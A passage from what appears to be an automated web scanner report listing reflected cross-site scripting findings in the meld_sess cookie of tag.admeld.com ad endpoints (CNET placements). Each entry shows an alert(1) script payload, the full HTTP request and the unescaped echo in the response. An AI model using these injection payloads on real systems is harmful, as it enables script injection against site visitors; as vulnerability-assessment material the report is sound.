o2MDQ0LCAiZmNwbSI6IjEwMDAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg3NTcsICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzMwIn0=
Content-Length: 1934
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:52 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb96ca37"><script>alert(1)</script>3c7b33ecac5&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.845. http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8b00"><script>alert(1)</script>52eddc7524e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf?t=1303941377365&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnet.com/apple-ipad/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9c8b00"><script>alert(1)</script>52eddc7524e; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY25ldGNvbW1lcmNlIiwgIGFkOiAgICAgICAgICAgMjk5MDI2MSwgIG5ldHdvcms6ICAgICAgImhvdXNlIiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiYjFmOTBkZGItZjMxYS00YWI1LWJmM2YtY2UwNWI2OGNjZGExIiwgIHVzZXI6ICAgICAgICAgImFjNWFmZTg5LWRiZTMtNGE5OS05YzYwLTU5ZjRmYjQ5NWNiOWM4YjAwIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+NTJlZGRjNzUyNGUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgImNuZXRjb21tZXJjZV9hdGYiLCAgZGl2OiAgICAgICAgICAiYjFmOTBkZGItZjMxYS00YWI1LWJmM2YtY2UwNWI2OGNjZGExIiwgIHVybDogICAgICAgICAgImh0dHA6Ly9jYnNpbnRlcmFjdGl2ZS5jb20iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAxMTEsICBhY2NvdW50X2lkOiAgIDY2MDYzLCAgbmV0d29ya19uYW1lOiAiSG91c2UgQXJ0IiwgIHB1Ymxpc2hlcl9uYW1lOiAiY2JzaW50ZXJhY3RpdmUiLCAgZWNwbTogICAgICAgICAiMC4yNSIsICBmZWNwbTogICAgICAgICIwLjI1IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJjbmV0Y29tbWVyY2VfYXRmIiwgIHJ1bGU6ICAgICAgICAgImNuZXRjb21tZXJjZV9hdGYiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4NDg0LCAiYnV5IjoxNzgsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2OTExNywgImJ1eSI6NTA0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlRyaWdnaXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5NjQ3LCAiYnV5IjoxMjQ0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4Njk0LCAiYnV5IjoxOTYsImxwIjoiaHR0cDovL3d3dy5zcHJpbnQuY29tL2xhbmRpbmdzL3dlYm9mZmVycy9zZWVrLmh0bWw/RUNJRD1NQTpBQjoyMDExMDQxNzpXRTpMVkU6U0VFSzpWMjo3Mjh4OTAiLCJhbiI6IlNwcmludCBFVEQiLCJzdGF0dXMiOiIwLjI2IiwiZmlkIjo2MDQ0LCAiZmNwbSI6IjEwMDAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg3OTksICJidXkiOjIwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzE2In0=
Content-Length: 2058
Content-Type: text/html
Date: Wed, 27 Apr 2011 21:59:44 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:728px;height:90px;margin:0;border:0">

...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9c8b00"><script>alert(1)</script>52eddc7524e&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.846. http://tag.admeld.com/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f742"><script>alert(1)</script>ecaa4441dd6 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cnetcommerce/728x90/cnetcommerce_atf?t=1303941377365&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnet.com/apple-ipad/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb98f742"><script>alert(1)</script>ecaa4441dd6; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY25ldGNvbW1lcmNlIiwgIGFkOiAgICAgICAgICAgMjk5MDI2MSwgIG5ldHdvcms6ICAgICAgImhvdXNlIiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiYjBmYjBkYmMtNjIwNy00ZmE2LTliZGItNzY3YzdhYWQ3ZmM3IiwgIHVzZXI6ICAgICAgICAgImFjNWFmZTg5LWRiZTMtNGE5OS05YzYwLTU5ZjRmYjQ5NWNiOThmNzQyIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+ZWNhYTQ0NDFkZDYiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgImNuZXRjb21tZXJjZV9hdGYiLCAgZGl2OiAgICAgICAgICAiYjBmYjBkYmMtNjIwNy00ZmE2LTliZGItNzY3YzdhYWQ3ZmM3IiwgIHVybDogICAgICAgICAgImh0dHA6Ly9jYnNpbnRlcmFjdGl2ZS5jb20iLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAxMTEsICBhY2NvdW50X2lkOiAgIDY2MDYzLCAgbmV0d29ya19uYW1lOiAiSG91c2UgQXJ0IiwgIHB1Ymxpc2hlcl9uYW1lOiAiY2JzaW50ZXJhY3RpdmUiLCAgZWNwbTogICAgICAgICAiMC4yNSIsICBmZWNwbTogICAgICAgICIwLjI1IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJjbmV0Y29tbWVyY2VfYXRmIiwgIHJ1bGU6ICAgICAgICAgImNuZXRjb21tZXJjZV9hdGYiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4NDg0LCAiYnV5IjoxNzgsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2OTExNywgImJ1eSI6NTA0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlRyaWdnaXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5NjQ3LCAiYnV5IjoxMjQ0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4Njk0LCAiYnV5IjoxOTYsImxwIjoiaHR0cDovL3d3dy5zcHJpbnQuY29tL2xhbmRpbmdzL3dlYm9mZmVycy9zZWVrLmh0bWw/RUNJRD1NQTpBQjoyMDExMDQxNzpXRTpMVkU6U0VFSzpWMjo3Mjh4OTAiLCJhbiI6IlNwcmludCBFVEQiLCJzdGF0dXMiOiIwLjA3IiwiZmlkIjo2MDQ0LCAiZmNwbSI6IjEwMDAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg3OTksICJidXkiOjIwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQ1In0=
Content-Length: 2058
Content-Type: text/html
Date: Wed, 27 Apr 2011 21:59:45 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:728px;height:90px;margin:0;border:0">

...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb98f742"><script>alert(1)</script>ecaa4441dd6&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.847. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_btf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/489/cnetnews/300x250/cnetnews_btf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67bed"><script>alert(1)</script>27e2c07eeaf was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cnetnews/300x250/cnetnews_btf?t=1303946102032&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fnews.cnet.com%2F8301-30686_3-20057815-266.html%3Ftag%3DtopStories1&refer=http%3A%2F%2Fnews.cnet.com%2F%3Ftag%3Dhdr%3Bbrandnav HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb967bed"><script>alert(1)</script>27e2c07eeaf; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY25ldG5ld3MiLCAgYWQ6ICAgICAgICAgICAyOTkwMjcxLCAgbmV0d29yazogICAgICAiaG91c2UiLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiNjAwYmRhYWItNzFhMi00NTQzLTgxYjYtZjI0ZDE2NzM0NmNkIiwgIHVzZXI6ICAgICAgICAgImFjNWFmZTg5LWRiZTMtNGE5OS05YzYwLTU5ZjRmYjQ5NWNiOTY3YmVkIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+MjdlMmMwN2VlYWYiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgImNuZXRuZXdzX2J0ZiIsICBkaXY6ICAgICAgICAgICI2MDBiZGFhYi03MWEyLTQ1NDMtODFiNi1mMjRkMTY3MzQ2Y2QiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL25ld3MuY25ldC5jb20vODMwMS0zMDY4Nl8zLTIwMDU3ODE1LTI2Ni5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTExLCAgYWNjb3VudF9pZDogICA2NjA2MywgIG5ldHdvcmtfbmFtZTogIkhvdXNlIEFydCIsICBwdWJsaXNoZXJfbmFtZTogImNic2ludGVyYWN0aXZlIiwgIGVjcG06ICAgICAgICAgIjAuMjUiLCAgZmVjcG06ICAgICAgICAiMC4yNSIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAiY25ldG5ld3NfYnRmIiwgIHJ1bGU6ICAgICAgICAgImNuZXRuZXdzX2J0ZiIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg0MTcsICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5MDg1LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHJpZ2dpdCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjk2MTUsICJidXkiOjEyNDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg2NjIsICJidXkiOjE4OSwibHAiOiJodHRwOi8vd3d3LmFyYWxpZmVzdHlsZS5jb20vIiwiYW4iOiJBUkFuZXQsIEluYy4iLCJzdGF0dXMiOiIwLjU5IiwiZmlkIjo2MDQ0LCAiZmNwbSI6IjEwMDAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg3NjcsICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQ0In0=
Content-Length: 2059
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:15:07 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb967bed"><script>alert(1)</script>27e2c07eeaf&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.848. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_btf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/489/cnetnews/300x250/cnetnews_btf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6276a"><script>alert(1)</script>8f6a76bb80e was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cnetnews/300x250/cnetnews_btf?t=1303946102032&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fnews.cnet.com%2F8301-30686_3-20057815-266.html%3Ftag%3DtopStories1&refer=http%3A%2F%2Fnews.cnet.com%2F%3Ftag%3Dhdr%3Bbrandnav HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb96276a"><script>alert(1)</script>8f6a76bb80e; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY25ldG5ld3MiLCAgYWQ6ICAgICAgICAgICAyOTkwMjcxLCAgbmV0d29yazogICAgICAiaG91c2UiLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICIxLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiZWI0YmY2N2MtMTAxOC00ZjMxLWFjZTMtM2RkOTA4YjIwNGU5IiwgIHVzZXI6ICAgICAgICAgImFjNWFmZTg5LWRiZTMtNGE5OS05YzYwLTU5ZjRmYjQ5NWNiOTYyNzZhIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+OGY2YTc2YmI4MGUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgImNuZXRuZXdzX2J0ZiIsICBkaXY6ICAgICAgICAgICJlYjRiZjY3Yy0xMDE4LTRmMzEtYWNlMy0zZGQ5MDhiMjA0ZTkiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL25ld3MuY25ldC5jb20vODMwMS0zMDY4Nl8zLTIwMDU3ODE1LTI2Ni5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTExLCAgYWNjb3VudF9pZDogICA2NjA2MywgIG5ldHdvcmtfbmFtZTogIkhvdXNlIEFydCIsICBwdWJsaXNoZXJfbmFtZTogImNic2ludGVyYWN0aXZlIiwgIGVjcG06ICAgICAgICAgIjAuMjUiLCAgZmVjcG06ICAgICAgICAiMC4yNSIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAiY25ldG5ld3NfYnRmIiwgIHJ1bGU6ICAgICAgICAgImNuZXRuZXdzX2J0ZiIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg0MTcsICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5MDg1LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHJpZ2dpdCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjk2MTUsICJidXkiOjEyNDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg2NjIsICJidXkiOjE4OSwibHAiOiJodHRwOi8vd3d3LmFyYWxpZmVzdHlsZS5jb20vIiwiYW4iOiJBUkFuZXQsIEluYy4iLCJzdGF0dXMiOiIwLjU5IiwiZmlkIjo2MDQ0LCAiZmNwbSI6IjEwMDAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg3NjcsICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzE2In0=
Content-Length: 2059
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:15:06 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb96276a"><script>alert(1)</script>8f6a76bb80e&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

3.849. http://tag.admeld.com/ad/iframe/489/cnetnews/728x90/cnetnews_atf [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
